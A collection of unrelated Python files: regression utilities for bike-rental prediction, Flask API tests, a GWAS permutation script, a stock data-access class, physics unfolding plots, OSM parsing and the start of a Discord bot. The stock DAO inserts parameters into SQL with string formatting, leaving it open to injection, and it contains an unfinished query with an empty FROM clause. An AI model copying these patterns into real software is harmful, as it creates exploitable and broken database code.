def save_figure(fig, filename):
"""
saves figure to filename path
arguments
---------
fig: figure
filename: string containing path to file
return
------
none
"""
fig.savefig(filename)
def feature_engineer(data, scaler_weatherFeatures, scaler_allFeatures, kind = "train"):
"""
prepares and scales features for linear regression including
- interaction terms,
- second-order features of weather data,
- weather variables: humidity, windspeed, atemp, weather,
- one-hot-encoded hours, months, years
arguments
---------
data: raw training data
scaler_weatherFreatures: a scaler initialized using sklearn's StandardScaler() which scales the weather features prior to calculating their second-order terms
scaler_allFeatures: a scaler initialized using sklearn's StandardScaler() which scales all features after engineering
kind: a string containing either "train" or "test" to indicate the type of dataset passed to the function
return
------
dataframe of engineered features
"""
df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']]
df['yr'] = data.index.year
df['mon'] = data.index.month
df['hr'] = data.index.hour
variables_to_be_encoded = df[['yr', 'mon', 'hr']]
df_notEncoded = df.drop(columns=['yr', "mon", 'hr'])
df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
df_unscaled = pd.concat([df_encoded, df_notEncoded], axis=1)
if kind == "train":
scaled_weatherFeatures = scaler_weatherFeatures.fit_transform(df_unscaled[['windspeed','humidity','atemp']])
elif kind == "test":
scaled_weatherFeatures = scaler_weatherFeatures.transform(df_unscaled[['windspeed', 'humidity', 'atemp']])
df_weather_scaled = pd.DataFrame(scaled_weatherFeatures)
df_weather_scaled.columns = ['windspeed', 'humidity', 'atemp']
df_weather_scaled.index = df_unscaled.index
df_unscaledFeatures = df_unscaled.drop(columns=['windspeed', 'humidity', 'atemp'])
df_features = df_weather_scaled.merge(df_unscaledFeatures, left_index=True, right_index=True)
df_features['hr_8_workingday'] = df_features.apply(lambda row: row['hr_8'] * row['workingday'], axis=1)
df_features['hr_18_workingday'] = df_features.apply(lambda row: row['hr_18'] * row['workingday'], axis=1)
df_features['hr_13_workingday'] = df_features.apply(lambda row: row['hr_13'] * row['workingday'], axis=1)
df_features['hr_15_workingday'] = df_features.apply(lambda row: row['hr_15'] * row['workingday'], axis=1)
df_features['hr_21_workingday'] = df_features.apply(lambda row: row['hr_21'] * row['workingday'], axis=1)
df_features['hr_1_workingday'] = df_features.apply(lambda row: row['hr_1'] * row['workingday'], axis=1)
df_features['hr_14_workingday'] = df_features.apply(lambda row: row['hr_14'] * row['workingday'], axis=1)
df_features['hr_16_workingday'] = df_features.apply(lambda row: row['hr_16'] * row['workingday'], axis=1)
df_features['windspeed_Sq'] = df_features.apply(lambda row: row['windspeed'] * row['windspeed'], axis=1)
df_features['humidity_Sq'] = df_features.apply(lambda row: row['humidity'] * row['humidity'], axis=1)
df_features['atemp_Sq'] = df_features.apply(lambda row: row['atemp'] * row['atemp'], axis=1)
df_features.drop(columns = "workingday", inplace = True)
if kind == "train":
scaled_features = scaler_allFeatures.fit_transform(df_features)
elif kind == "test":
scaled_features = scaler_allFeatures.transform(df_features)
df_features_scaled = pd.DataFrame(scaled_features)
df_features_scaled.columns = df_features.columns
df_features_scaled.index = df_features.index
return df_features_scaled, scaler_weatherFeatures, scaler_allFeatures
def feature_engineer_rbf(data):
"""
prepares features for linear regression including
- interaction terms of rbfs and non-workingdays,
- weather variables: humidity, windspeed, atemp, weather,
- one-hot-encoded hours, months, years
arguments
---------
data: raw training data
return
------
dataframe of engineered features
"""
df = data[
['humidity', 'windspeed', 'atemp', 'weather', 'workingday', 'rbf_22', 'rbf_8', 'rbf_3', 'rbf_11', 'rbf_15']]
df['yr'] = data.index.year
df['mon'] = data.index.month
df['hr'] = data.index.hour
variables_to_be_encoded = df[['yr', 'mon', 'hr']]
df_notEncoded = df.drop(columns=['yr', "mon", 'hr'])
df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
df_features['hr_8_weekendHol_rbf'] = df_features.apply(lambda row: row['rbf_22']*(not(row['workingday'])),axis=1)
df_features['hr_18_weekendHol_rbf'] = df_features.apply(lambda row: row['rbf_8']*(not(row['workingday'])),axis=1)
df_features['hr_13_weekendHol_rbf'] = df_features.apply(lambda row: row['rbf_3']*(not(row['workingday'])),axis=1)
df_features['hr_21_weekendHol_rbf'] = df_features.apply(lambda row: row['rbf_11']*(not(row['workingday'])),axis=1)
df_features['hr_1_weekendHol_rbf'] = df_features.apply(lambda row: row['rbf_15']*(not(row['workingday'])),axis=1)
df_features.drop(columns=['rbf_22', 'rbf_8', 'rbf_3', 'rbf_11', 'rbf_15','workingday'], inplace = True)
return df_features
def feature_engineer_interaction_terms(data):
"""
prepares features for linear regression including
- interaction terms,
- weather variables: humidity, windspeed, atemp, weather,
- one-hot-encoded hours, months, years
arguments
---------
data: raw training data
return
------
dataframe of engineered features
"""
df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']]
df['yr'] = data.index.year
df['mon'] = data.index.month
df['hr'] = data.index.hour
variables_to_be_encoded = df[['yr', 'mon', 'hr']]
df_notEncoded = df.drop(columns=['yr', "mon", 'hr'])
df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
df_features['hr_8_workingday'] = df_features.apply(lambda row: row['hr_8'] * row['workingday'], axis=1)
df_features['hr_18_workingday'] = df_features.apply(lambda row: row['hr_18'] * row['workingday'], axis=1)
df_features['hr_13_workingday'] = df_features.apply(lambda row: row['hr_13'] * row['workingday'], axis=1)
df_features['hr_21_workingday'] = df_features.apply(lambda row: row['hr_21'] * row['workingday'], axis=1)
df_features['hr_1_workingday'] = df_features.apply(lambda row: row['hr_1'] * row['workingday'], axis=1)
df_features.drop(columns = "workingday", inplace = True)
return df_features
def feature_engineer_single_interaction_term(data):
"""
prepares features for linear regression including
- single interaction term between 8th hour and workingday booleans,
- weather variables: humidity, windspeed, atemp, weather,
- one-hot-encoded hours, months, years
arguments
---------
data: raw training data
return
------
dataframe of engineered features
"""
df = data[['humidity', 'windspeed', 'atemp', 'weather', 'workingday']]
df['yr'] = data.index.year
df['mon'] = data.index.month
df['hr'] = data.index.hour
variables_to_be_encoded = df[['yr', 'mon', 'hr']]
df_notEncoded = df.drop(columns=['yr', "mon", 'hr'])
df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['yr', 'mon', 'hr'], drop_first=True)
df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
df_features['hr_8_workingday'] = df_features.apply(lambda row: row['hr_8'] * row['workingday'], axis=1)
df_features.drop(columns=['workingday'], inplace = True)
return df_features
def feature_engineer_baseline(data):
"""
prepares features for linear regression including
- weather variables: humidity, windspeed, atemp, weather,
- one-hot-encoded hours, day of the week, months, years
arguments
---------
data: raw training data
return
------
dataframe of engineered features
"""
df = data[['humidity', 'windspeed', 'atemp', 'weather']]
df['yr'] = data.index.year
df['mon'] = data.index.month
df['dayOfWeek'] = data.index.dayofweek
df['hr'] = data.index.hour
variables_to_be_encoded = df[['yr', 'mon', 'dayOfWeek', 'hr']]
df_notEncoded = df.drop(columns=['yr', "mon", "dayOfWeek", 'hr'])
df_encoded = pd.get_dummies(variables_to_be_encoded, columns=['dayOfWeek', 'yr', 'mon', 'hr'], drop_first=True)
df_features = pd.concat([df_encoded, df_notEncoded], axis=1)
return df_features
def rbf(x, width, mean):
"""
returns a numpy array of the probability of normally distributed x-variable
arguments
---------
x: normally distributed variable
width: variance of x
mean: mean of x
return
------
numpy array
"""
return np.exp(-(x - mean) ** 2 / (2 * width))
def rbf_transform(df, freq, width):
"""
returns radial based function-encoded features based on the normal distribution
arguments
---------
df: dataframe of features to be rbf-encoded
freq: frequency
width: chosen width of the normal distribution
return
------
dataframe
"""
x = np.arange(df.shape[0])
for i in range(0, freq):
df[f'rbf_{i}'] = 0
j = -freq
while j <= df.shape[0]:
df[f'rbf_{i}'] += rbf(x, width, i + j)
j += freq
return df
def print_model_scores(model, X_train, X_test, y_train, y_test):
"""
prints model scores
arguments
---------
model: machine learning model
X_train: feature engineered training data
X_test: feature engineedred test data
y_train: target y-variable of the training data set
y_test: target y-variable of the test data set
return
------
none
"""
print(f'Training Score rSq: {model.score(X_train, y_train)}')
print(f'Testing Score rSq: {model.score(X_test, y_test)}')
def print_logmodel_scores(model, X_train, X_test, y_train, y_test):
"""
prints multiple scores of a model trained against the logarithm of the target variable
arguments
---------
model: machine learning model
X_train: feature engineered training data
X_test: feature engineedred test data
y_train: target y-variable of the training data set
y_test: target y-variable of the test data set
return
------
none
"""
y_pred_train = model.predict(X_train)
y_pred_test = model.predict(X_test)
rSq_train = r2_score(y_train, np.exp(y_pred_train))
rSq_test = r2_score(y_test, np.exp(y_pred_test))
mSqE_test = mean_squared_error(y_test, np.exp(y_pred_test))
mSqE_train = mean_squared_error(y_train, np.exp(y_pred_train))
rmSqE_test = np.sqrt(mSqE_test)
rmSqE_train = np.sqrt(mSqE_train)
mSqLE_test = mean_squared_log_error(y_test, np.exp(y_pred_test))
mSqLE_train = mean_squared_log_error(y_train, np.exp(y_pred_train))
rmSqLE_test = np.sqrt(mSqLE_test)
rmSqLE_train = np.sqrt(mSqLE_train)
result_dict = {'Train rSq': rSq_train, 'Test rSq': rSq_test, 'Train rmSqE': rmSqE_train, 'Test rmSqE': rmSqE_test, 'Train mSqLE': mSqLE_train, 'Test mSqLE': mSqLE_test}
result = pd.DataFrame(result_dict, index=[0])
print(result)
def print_cross_val_results(model, X_train, y_train):
"""
prints multiple cross-validation scores of a model
arguments
---------
model: machine learning model
X_train: feature engineered training data
y_train: target y-variable of the training data set
return
------
none
"""
mse = make_scorer(mean_squared_error)
rmse = make_scorer(mean_squared_error, squared = False)
rSq = cross_val_score(model, X_train, y_train, cv=5)
mSqLE = cross_val_score(model, X_train, y_train, cv=5, scoring=mse)
rmSqLE = np.sqrt(mSqLE)
result_dict = {'rSq': rSq, 'mean rSq': rSq.mean(), 'std rSq': rSq.std(), 'mSqLE': mSqLE, 'rmSqLE': rmSqLE}
result = pd.DataFrame(result_dict)
print(result)
def bootstrapping(model, X_train, y_train):
"""
prints bootstrapped confidence intervals of the mean squared log error
*** function under construction: currently predicts on the training data, but should predict on the out-of-sample test data
arguments
---------
model: machine learning model
X_train: feature engineered training data
y_train: target y-variable of the training data set
return
------
none
"""
boots = []
for i in range(1000):
Xb, yb = resample(X_train, y_train)
model.fit(Xb, np.log(yb))
y_pred_train = model.predict(Xb)
mSqLE = mean_squared_log_error(yb, np.exp(y_pred_train))
rmSqLE = np.sqrt(mSqLE)
boots.append(rmSqLE)
boots.sort()
ci80 = boots[100:-100]
print(f"80% confidence interval: {ci80[0]:5.2} -{ci80[-1]:5.2}")
ci90 = boots[50:-50]
print(f"90% confidence interval: {ci90[0]:5.2} -{ci90[-1]:5.2}")
ci95 = boots[25:-25]
print(f"95% confidence interval: {ci95[0]:5.2} -{ci95[-1]:5.2}")
ci99 = boots[5:-5]
print(f"99% confidence interval: {ci99[0]:5.2} -{ci99[-1]:5.2}")
def submit(model, train_data, test_data, y, file_name="submission_default.csv"):
"""
creates kaggle submission file from entire pipeline:
- feature engineering of test and training data
- fits model to logarithm of target y-variable and training data
- makes predictions of the test data set with trained model
- generates csv file from predictions
arguments
---------
model: unfitted machine learning model
train_data: raw training data
test_data: raw test data
y: target y-variable of the training data set
file_name: string containing path to file
return
------
none
"""
data_fe = feature_engineer(train_data)
model.fit(data_fe, np.log(y))
data_test_fe = feature_engineer(test_data)
y_pred = model.predict(data_test_fe)
y_pred_s = pd.Series(np.exp(y_pred))
datetime = pd.Series(test_data.index)
result = pd.concat([datetime, y_pred_s], axis=1)
submission_data = result
submission_data.columns = ['datetime', 'count']
submission_data.to_csv(file_name, index=False)
print(f"Successfully generated prediction: {file_name}.")
|
import setuptools
with open("README.rst", "r") as readMe:
long_description = readMe.read()
setuptools.setup(
name="billionfong",
version="1.2.6",
author="Billy Fong",
author_email="billionfong@billionfong.com",
description="Welcome to billionfong's playground",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://www.billionfong.com/",
download_url="https://github.com/billionfong/Python_Package",
packages=setuptools.find_packages(),
)
|
import pytest
import sys
import random
import string
import json
from app import create_app
def random_string_generator():
allowed_chars = string.ascii_letters + string.punctuation
size = 12
return ''.join(random.choice(allowed_chars) for x in range(size))
username = random_string_generator()
password = random_string_generator()
print("Testing with ", username, "as Admin")
@pytest.fixture
def client():
app = create_app("test_config")
app.config['TESTING'] = True
with app.test_client() as client:
yield client
def test_register_and_login_admin(client):
"""Make sure register and login works."""
res = register_as_admin(client)
res_json = json.loads(res.decode("utf-8"))
assert len(res_json) == 1
reg_user_id = res_json[0].get("id")
reg_user_name = res_json[0].get("user_name")
reg_user_role = res_json[0].get("user_role")
assert reg_user_name == username
assert reg_user_role == "admin"
res = login(client)
res_json = json.loads(res.decode("utf-8"))
assert len(res_json) == 1
login_user_id = res_json[0].get("id")
login_user_name = res_json[0].get("user_name")
login_user_role = res_json[0].get("user_role")
assert (login_user_id == reg_user_id and \
login_user_name == reg_user_name and login_user_role == reg_user_role)
def test_read_admin(client):
"'Make sure crud/read works'"
res = read(client)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
for each in res_json:
assert isinstance(each.get("id"), (int, float))
assert isinstance(each.get("name"), str)
assert isinstance(each.get("99popularity"), float)
assert isinstance(each.get("director"), str)
assert isinstance(each.get("genre"), str)
assert isinstance(each.get("imdb_score"), float)
test_movie = res_json[0]
movie_id = test_movie.get("id")
res = read_with_id(client, movie_id)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
assert len(res_json) == 1
assert res_json[0] == test_movie
def test_create_update_delete_admin(client):
"'Make sure crud/create works'"
res = create(client)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
assert len(res_json) == 1
assert isinstance(res_json[0].get("id"), (int, float))
assert isinstance(res_json[0].get("name"), str)
assert isinstance(res_json[0].get("99popularity"), float)
assert isinstance(res_json[0].get("director"), str)
assert isinstance(res_json[0].get("genre"), str)
assert isinstance(res_json[0].get("imdb_score"), float)
movie_id = res_json[0].get("id")
res = update(client, movie_id)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
assert len(res_json) == 1
updated_json = {
"id" : movie_id,
"name" : "movie",
"director" : "director",
"99popularity": 50.0,
"genre": ["Action"],
"imdb_score": 5.0
}
updated_json["genre"] = ",".join(sorted([i.strip() for i in updated_json.get("genre")]))
assert res_json[0] == updated_json
res = delete(client, movie_id)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
assert len(res_json) == 1
assert res_json[0] == updated_json
def test_search_admin(client):
"'Make sure search/movies works'"
res = create(client)
res_json = json.loads(res.decode("utf-8"))
created_movie = res_json[0]
movie_id = created_movie.get("id")
res = search(client)
res_json = json.loads(res.decode("utf-8"))
assert isinstance(res_json, list)
created_movie["genre"] = ",".join(sorted([i.strip() for i in created_movie.get("genre")]))
for each in res_json:
assert "movie" in each.get("name").lower()
assert "director" in each.get("director").lower()
res = delete(client, movie_id)
def test_logout_admin(client):
"'Make sure user/logout works'"
res = logout(client)
assert b"{\"status\": \"success\", \"msg\": \"Logged Out\"}" in res
def logout(client):
login(client)
return client.delete('user/logout').data
def search(client):
login(client)
return client.get('search/movies?name=movie&director=director').data
def delete(client, movie_id):
login(client)
return client.delete('crud/delete/' + str(movie_id)).data
def update(client, movie_id):
login(client)
return client.patch('crud/update/' + str(movie_id), json={
"name" : "movie",
"director" : "director",
"99popularity": 50.0,
"genre": ["Action"],
"imdb_score": 5.0
}).data
def create(client):
login(client)
return client.post('crud/create', json={
"name" : "movie",
"director" : "director",
"99popularity": 50.0,
"genre": ["Action"],
"imdb_score": 5.0
}).data
def read(client):
login(client)
return client.get("crud/read").data
def read_with_id(client, movie_id):
login(client)
return client.get("crud/read/" + str(movie_id)).data
def register_as_admin(client):
return client.post('user/register', json={
"user_name" : username,
"password" : password,
"user_role" : "admin"
}).data
def login(client):
return client.post('user/login', json={
"user_name" : username,
"password" : password
}).data |
"""
(C) Casey Greene.
This python script generates a number of different files that serve as permuted
standards for NetWAS analysis from a GWAS. These files differ only in their
gene ordering to evaluate the effects of multiple cross validation intervals
on the results.
"""
import os
import pandas as pd
import numpy as np
np.random.seed(42)
# header on the first line, gene name in the second col
vegas_ad1 = pd.read_excel('data/vegas_adni1.xls', header=0)
vegas_ad2 = pd.read_excel('data/vegas_adni2.xls', header=0)
entrez_symbol = pd.read_csv('data/symbol_entrez.txt', sep='\t', header=None,
index_col=1)
symbol_entrez = pd.read_csv('data/symbol_entrez.txt', sep='\t', header=None,
index_col=0)
d_se = symbol_entrez.to_dict(orient='dict')[1]
vegas_ad1['Entrez'] = vegas_ad1['Gene'].map(d_se)
vegas_ad2['Entrez'] = vegas_ad2['Gene'].map(d_se)
vegas_ad1 = vegas_ad1.dropna(how='any')
vegas_ad2 = vegas_ad2.dropna(how='any')
vegas_ad1['nw_std'] = vegas_ad1['Pvalue'].map(lambda x: 1 if x < 0.01 else 0)
vegas_ad2['nw_std'] = vegas_ad2['Pvalue'].map(lambda x: 1 if x < 0.01 else 0)
if not os.path.exists('standards'):
os.mkdir('standards')
if not os.path.exists('standards/p_vegas_ad1'):
os.mkdir('standards/p_vegas_ad1')
if not os.path.exists('standards/p_vegas_ad2'):
os.mkdir('standards/p_vegas_ad2')
for i in xrange(1000):
vg_perm = vegas_ad1.apply(np.random.permutation)
vg_perm['Entrez'] = vg_perm['Entrez'].astype(int)
vg_perm.to_csv('standards/p_vegas_ad1/' + str(i), sep="\t",
columns=['Entrez', 'nw_std'], header=False, index=False)
for i in xrange(1000):
vg_perm = vegas_ad2.apply(np.random.permutation)
vg_perm['Entrez'] = vg_perm['Entrez'].astype(int)
vg_perm.to_csv('standards/p_vegas_ad2/' + str(i), sep="\t",
columns=['Entrez', 'nw_std'], header=False, index=False)
|
# -*- coding: utf-8 -*-
# Description:
# Created: liujiaye 2020/08/11
from app.utils.base_dao import BaseDao
class StockDao(BaseDao):
def select_stock_day_detail(self, day):
sql = """SELECT
id,
ORITEMNUM order_number,
NOTICENUM shipping,
WAINTFORDELNUMBER w_count,
WAINTFORDELWEIGHT w_weight,
CANSENDNUMBER c_count,
CANSENDWEIGHT c_weight,
SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
DETAILADDRESS unloading_address,
record_day time_period,
CITY city,
end_point district,
ALTERTIME can_send_date,
COMMODITYNAME prod_name,
CONTACTNAME receiving_user
FROM
can_be_send_amount_daily
WHERE
record_day='{0}'"""
data = self.select_all(sql.format(day))
# print(sql.format(day))
return data
def select_stock_log(self, date1, date2):
sql = """SELECT
id,
ORITEMNUM order_number,
NOTICENUM shipping,
WAINTFORDELNUMBER w_count,
WAINTFORDELWEIGHT w_weight,
CANSENDNUMBER c_count,
CANSENDWEIGHT c_weight,
SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
DETAILADDRESS unloading_address,
ALTERTIME can_send_date,
CITY city,
ADDRESS district,
COMMODITYNAME prod_name,
STATUS status
FROM
can_be_send_amount_log_small
WHERE
ALTERTIME>={0} and ALTERTIME<={1}"""
data = self.select_all(sql.format(date1, date2))
return data
def execute_add_stock(self, cargo_list):
# =================增加写数据库的sql====================
sql = ""
for i in cargo_list:
sql += ""
self.executemany(sql)
def select_out_stock_data(self, begin_time,end_time):
"""
读取历史装车清单数据
:param begin_time:
:param end_time:
:return:
"""
# =================修改sql====================
sql = """SELECT
id,
ORITEMNUM order_number,
NOTICENUM shipping,
WAINTFORDELNUMBER w_count,
WAINTFORDELWEIGHT w_weight,
CANSENDNUMBER c_count,
CANSENDWEIGHT c_weight,
SUBSTRING_INDEX(DELIWAREHOUSE,'-',1) out_stock,
DETAILADDRESS unloading_address,
CALCULATETIME time_period,
CITY city,
end_point district
FROM
WHERE
CALCULATETIME>={0} and CALCULATETIME<={1}"""
data = self.select_all(sql.format(begin_time,end_time))
return data
stock_dao = StockDao()
|
#! usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from numpy import linalg
def calc_granularity(hist2d_output):
'''Calulates the granularity of a plt.hist2d object.
The granularity approaches 0 when the histogram approaches a single bin, and 1 when the
geometric area of the diagonal is negligble with respect to the range of the histogram.
Assumes the hist2d is square.
'''
bex = hist2d_output[1]
length = max(bex) - min(bex)
area = length**2
diag_area = 0
for i in range(len(bex)-1):
diag_area += (bex[i+1]-bex[i])**2
return (1-diag_area/area)
def calc_diagonality(hist2d_output):
'''Calulates the diagonality of a plt.hist2d object.
The diagonality approaches 0 when the diagonal elements contain none of the total histogram
content, and 1 when diagonal elements contain the total histogram content.
Assumes the hist2d is square.
'''
bc = hist2d_output[0]
bc_total = bc.sum()
bc_diag = 0
for i in range(len(bc)):
bc_diag += bc[i, i]
return (bc_diag/bc_total)
def calc_response_matrix(df, bins, lims):
bc, bex, bey = np.histogram2d(df['reco'], df['gen'], bins, range=(lims, lims))
for i in range(bc.shape[0]):
col_sum = sum(bc[i, :])
if col_sum > 0:
bc[i, :] /= float(col_sum)
return bc, bex, bey
def plot_events_and_response(df, bins, rem, lims):
fig, ax = plt.subplots(1, 2)
fig.suptitle(str(bins)+' bins' if type(bins) == int else 'Bayesian ('+str(len(bins)-1)+')')
ax[0].hist2d(df['reco'], df['gen'], bins, range=[lims, lims])
ax[0].set_title('Gen v Reco')
ax[0].set_xlabel('reco')
ax[0].set_ylabel('gen')
fig.colorbar(ax[0].images[-1], ax=ax[0])
pc = ax[1].pcolor(rem[1], rem[2], rem[0].T)
ax[1].axis([rem[1].min(), rem[1].max(), rem[2].min(), rem[2].max()])
plt.colorbar(pc, ax=ax[1])
ax[1].set_title('Response Matrix')
ax[1].set_xlabel('reco')
ax[1].set_ylabel('gen')
def plot_inv_rem(rem_tuple):
pinv = linalg.pinv(rem_tuple[0])
plt.pcolor(rem_tuple[1], rem_tuple[2], pinv.T)
plt.axis([rem_tuple[1].min(), rem_tuple[1].max(), rem_tuple[2].min(), rem_tuple[2].max()])
plt.colorbar()
plt.title('Response Matrix Pseudo-Inverse')
plt.xlabel('reco')
plt.ylabel('gen')
return pinv
def unfold_and_plot(rem, bc, bin_edges):
inv_rem = linalg.pinv(rem)
bc_shift = np.dot(inv_rem, bc)
cov = np.zeros(inv_rem.shape)
for i in range(inv_rem.shape[0]):
for j in range(inv_rem.shape[1]):
for k in range(len(bc)):
cov[i,j] += inv_rem[i,k]*inv_rem[j,k]*bc[k]
print np.diag(cov)
bin_left = bin_edges[:-1]
bin_width = bin_edges[1:]-bin_edges[:-1]
#plt.bar(bin_left, bc/bin_width, width=bin_width, alpha=0.5, label='reco')
plt.bar(bin_left, bc_shift, width=bin_width, alpha=0.5,
color='red', label='unfolded', yerr=np.sqrt(np.abs(np.diag(cov))), ecolor='r')
plt.ylim((max(plt.ylim()[0], -plt.ylim()[1]), plt.ylim()[1]))
plt.legend()
|
# coding:utf-8
'''
Created on 2013-6-11
@author: wolf_m
'''
class ViperClientGroup():
inst = None
def __init__(self):
self.clientMap = {}
def addClient(self, client):
if client.id in self.clientMap:
return None
else:
self.clientMap[client.id] = client
return client
def broadcast(self,message):
pass
def removeClientById(self, clientId):
del self.clientMap[clientId]
def removeClient(self, client):
del self.clientMap[client.id]
def getClientSize(self):
return len(self.clientMap.keys())
@staticmethod
def getInstance():
if ViperClientGroup.inst == None:
ViperClientGroup.inst = ViperClientGroup()
return ViperClientGroup.inst
|
in_queue = Queue()
def consumer():
print('Consumer waiting')
work = in_queue.get() # 두 번째로 완료함
print('Consumer working')
# 작업을 수행함
# ...
print('Consumer done')
in_queue.task_done() # 세 번째로 완료함
Thread(target=consumer).start()
in_queue.put(object()) # 첫 번째로 완료함
print('Producer waiting')
in_queue.join()
print('Producer done')
>>>
Consumer waiting
Producer waiting
Consumer working
Consumer done
Producer done
|
#Multiplies a factor times all of the elements in a list
number_list = [2, 4, -22, 10, -16, 20, 55]
my_number = 10
multiplied_list = []
for num in number_list:
new_number = num * my_number
multiplied_list.append(new_number)
print(multiplied_list) |
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 10 21:55:45 2019
@author: yoelr
"""
import numpy as np
from .array import array
__all__ = ('tuple_array',)
ndarray = np.ndarray
asarray = np.asarray
def invalid_method(self, *args, **kwargs):
raise TypeError(f"'{type(self).__name__}' objects are immutable.")
class tuple_array(ndarray):
"""Create an array that is immutable and hashable.
**Parameters**
**array:** [array_like] Input data, in any form that can be converted to an array. This includes lists, lists of tuples, tuples, tuples of tuples, tuples of lists and ndarrays.
**dtype:** [data-type] By default, the data-type is inferred from the input data.
**order:** {'C', 'F'} Whether to use row-major (C-style) or column-major (Fortran-style) memory representation. Defaults to ‘C’.
**Examples**
Create a tuple_array object:
.. code-block:: python
>>> arr = tuple_array([1, 18])
tuple_array([1, 18])
tuple_array objects are immutable:
>>> arr[1] = 0
TypeError: 'tuple_array' objects are immutable.
tuple_array objects are hashable:
>>> hash(arr)
3713080549427813581
"""
__slots__ = ()
def __new__(cls, arr, dtype=np.float64, order='C'):
self = asarray(arr, dtype, order).view(cls)
return self
def __hash__(self):
return hash((tuple(self)))
def __setitem__(self, key, val):
raise TypeError(f"'{type(self).__name__}' objects are immutable.")
def __array_wrap__(self, out_arr):
# New array should not be a tuple_array
if self is not out_arr: out_arr.__class__ = array
return out_arr
__repr__ = array.__repr__
__iadd__ = __isub__ = __imul__ = __imatmul__ = __itruediv__ = __idiv__ = __ifloordiv__ = __imod__ = __ipow__ = __ilshift__ = __irshift__ = __iand__ = __ixor__ = __ior__ = invalid_method
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 24 10:05:56 2018
@author: Jun Wang
"""
import xml.etree.cElementTree as ET
# import pprint
import re
import codecs
import json
from audit import update_name
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
CREATED = [ "version", "changeset", "timestamp", "user", "uid"]
changes = {u'中国农业银行': u'农业银行',
u'中国工商银行': u'工商银行',
u'中国建设银行': u'建设银行',
u'中国民生银行': u'民生银行',
"McDonald's": u'麦当劳',
'McDonald': u'麦当劳',
'McDonalds': u'麦当劳',
u"金拱门 麥當勞 Mc'Donald": u'麦当劳',
'Pizza Hut': u'必胜客',
'KFC': u'肯德基',
'Subway': u'赛百味'}
# UPDATE THIS VARIABLE
mapping = { "St": "Street",
"St.": "Street",
"Rd": "Road",
"Rd.": "Road",
"road": "Road",
"Ave": "Avenue",
"Ave.": "Avenue",
"ave": "Avenue",
"Sheng": "Province",
"Shi": "City",
"Qu": "District",
"Lu": "Road",
"Jie": "Street",
"Dong": "East",
"Xi": "West",
"Nan": "South",
"Bei": "North",
"N": "North",
"S": "South",
"E": "East",
"W": "West"
}
def shape_element(element):
node = {}
if element.tag == "node" or element.tag == "way" :
# YOUR CODE HERE
created = {}
node_refs = []
attrib = element.attrib
for field in CREATED:
created[field] = attrib[field]
node['created'] = created
if 'lat' in attrib.keys():
node['pos'] = [float(attrib['lat']), float(attrib['lon'])]
node['type'] = element.tag
if 'visible' in attrib.keys():
node['visible'] = attrib['visible']
node['id'] = attrib['id']
if len(element.getchildren()):
address = {}
for elem in element.getchildren():
if elem.tag == 'nd':
node_refs.append(elem.attrib['ref'])
node['node_refs'] = node_refs
if elem.tag == 'tag':
k = elem.attrib['k']
v = elem.attrib['v']
if not len(re.findall(problemchars, k)):
addr_k = re.findall(re.compile('^addr\:(\D+)'), k)
if len(addr_k):
addr_k = addr_k[0].split(':')
if len(addr_k) == 1:
better_v = update_name(v, mapping)
address[addr_k[0]] = better_v
node['address'] = address
elif k.find(':') == -1 and k == 'name':
if v in changes.keys():
v = changes[v]
else:
pass
node[k] = update_name(v, mapping)
elif k.find(':') == -1:
node[k] = v
else:
pass
return node
else:
return None
def process_map(file_in, pretty = False):
# You do not need to change this file
file_out = "{0}.json".format(file_in)
data = []
counter = 0 #added counter to show status when creating json file
with codecs.open(file_out, "w") as fo:
for _, element in ET.iterparse(file_in):
el = shape_element(element)
counter += 1
print counter
if el:
data.append(el)
if pretty:
fo.write(json.dumps(el, indent=2)+"\n")
else:
fo.write(json.dumps(el) + "\n")
return data
def test():
data = process_map('map_sample.osm', True)
#pprint.pprint(data)
if __name__ == "__main__":
test()
|
from django.urls import path
from django.urls import path,include
from . import views
urlpatterns = [
path('product-grid/',views.products_grid, name='products_grid'),
] |
#!/usr/bin/env python3
import asyncio
import json
import logging
import random
import string
import threading
import discord
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class TimerClass(threading.Thread):
def __init__(self, bot):
threading.Thread.__init__(self)
self.daemon = True
self.event = threading.Event()
self.count = 10
self.bot = bot
def run(self):
while True:
while not self.event.is_set():
self.event.wait(45)
cmd = self.bot.aidsfest_next_in_line()
asyncio.ensure_future(cmd)
log.info('Restarting timer')
self.event.clear()
def stop(self):
self.event.set()
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.SystemRandom().choice(chars) for _ in range(size))
class DiscordBot(discord.Client):
def __init__(self):
super().__init__()
self.quitting = False
self.server_name = 'NymN'
self.sub_role_name = 'Twitch Subscriber'
self.current_speaker_role_name = 'Current Speaker'
self.moderator_role_names = ['Moderator', 'Roleplayer']
self.aidsfest_text_channel_name = 'chemotherapy'
self.queue_path = '/tmp/aidsfest_queue_nymn'
self.aidsfest_queue = []
self.load_queue()
async def quit(self):
self.quitting = True
await self.close()
def get_server(self, server_name):
return discord.utils.find(lambda server: server.name == server_name, self.servers)
def get_role(self, role_name):
return discord.utils.find(lambda role: role.name == role_name, self.main_server.roles)
def get_text_channel(self, channel_name):
